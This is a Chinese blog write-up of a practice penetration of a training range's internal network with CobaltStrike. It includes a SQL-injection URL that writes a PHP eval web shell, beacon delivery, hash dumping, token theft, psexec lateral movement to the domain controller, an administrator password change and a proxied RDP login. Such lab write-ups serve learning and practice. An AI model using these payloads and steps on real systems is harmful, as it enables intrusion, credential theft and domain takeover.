前言
- 掌控安全里面的靶场内网渗透,练练手!
实操
环境:http://afsgr16-b1ferw.aqlab.cn/?id=1
工具:CobaltStrike 3.14 学习
最近学习CobaltStrike,所以写一篇关于CobaltStrike的姿势
上篇文章都讲过了就不赘述了,拿到shell上蚁剑
1 | http://afsgr16-b1ferw.aqlab.cn/?id=1.1 union select 1,"<?php eval($_REQUEST[gylq]);?>" into outfile 'C:/phpstudy/www/shell.php' |
②蚁剑连接,发现权限很低
CobaltStrike超简单拿域控
由于大部分师傅可能都不知道CobaltStrike是啥,我说一下怎么开teamserver,和启动CobaltStrike,具体原理请百度
一、启动CobaltStrike
1、先将CobaltStrike放入kali中,然后启动teamserve命令
1 | ./teamserver 192.168.1.105 123456 |
2、在我的电脑中启动CobaltStrike,连上50050端口密码123456,主机是我们刚刚设置的ip地址也就是kali的ip地址,具体看图
二、脚本web传递拿beacon
1、打开监听器,反弹http的beacon,监听我们内网穿透的端口和地址
2、在攻击里面找到脚本web传递
2、按图设置
3、将生成的代码保存起来
4、在蚁剑中执行这段代码就可以拿到shell了
5、接着CobaltStrike自动就上线了
6、提权就成功了选择自己一开始的监听器
7、接着就反弹一个system的beacon
8、这里可以转到msf探测一下C段,但是我们已经知道10.0.1.8这个ip,可以直接hash传递得到beacon,先制作一个令牌
①先hashdump导出hash
②制作令牌就会自动获取我们刚刚导入的hash
③记得选择admin开头的接着令牌就成功了
9、利用令牌直接hash传递拿到10.0.1.8这台机子的system权限
①设置一个监听直连smb,端口随意
②执行下面命令
1 | psexec_psh 10.0.1.8 smb-beacon |
③接着10.0.1.8这台机子就上线了,smb形式就是445端口
三、拿域控之前的CobaltStrike命令积累学习
由于我们知道域控机子ip就是10.0.1.6,上篇文章讲过了,就不复述的去实践扫描了,直接开始命令学习
1、查看当前用户组
1 | shell whoami/groups |
2、查看域
1 | shell net view /domain |
3、枚举域内主机
1 | shell net view /domain:GYLQ |
4、查看DC域控主机
1 | shell net group "domain Controllers" /domain |
5、查看DC的ip
6、查看域的信任关系
7、powershell导入power-view模块,去github找一个powertools,这部分只是学习命令,可以跳过
1 | powershell Invoke-ACLScanner //查看域的信息 |
2、查看共享文件夹情况
1 | powershell Invoke-ShareFinder |
四、CobaltStrike自动化拿域控?
上面的漫长的废话搞完了,接下来实操。
1、打开文件管理,看到域控有登陆过这台机子,刚好我们换成域控权限,PID是1796
2、盗取token
3、利用共享文件夹发现可以访问域控的C盘了,这时能拿域控的方法太多,我随便选一个
4、直接用拿10.0.1.8的方法拿10.0.1.6,简直不要太简单了好吧,我上篇文章还要转来转去,接着DC就上线了。
1 | psexec_psh 10.0.1.6 smb-beacon |
5、怎么进人域控的桌面,接着挂个socks代理
①进入这里
②接着socks1080
③然后将其中的一个管理员的密码改成testTEST123
④利用proxychains4代理连上去,不懂看上篇文章,写的很详细
1 | proxychains4 rdesktop -u administrator -p woshifengge1. 10.0.1.8 |
总结
最近学了CobaltStrike才知道这就点几下就拿域控了,不需要复杂的命令。下次加油。
我的个人博客
孤桜懶契:http://gylq.gitee.io
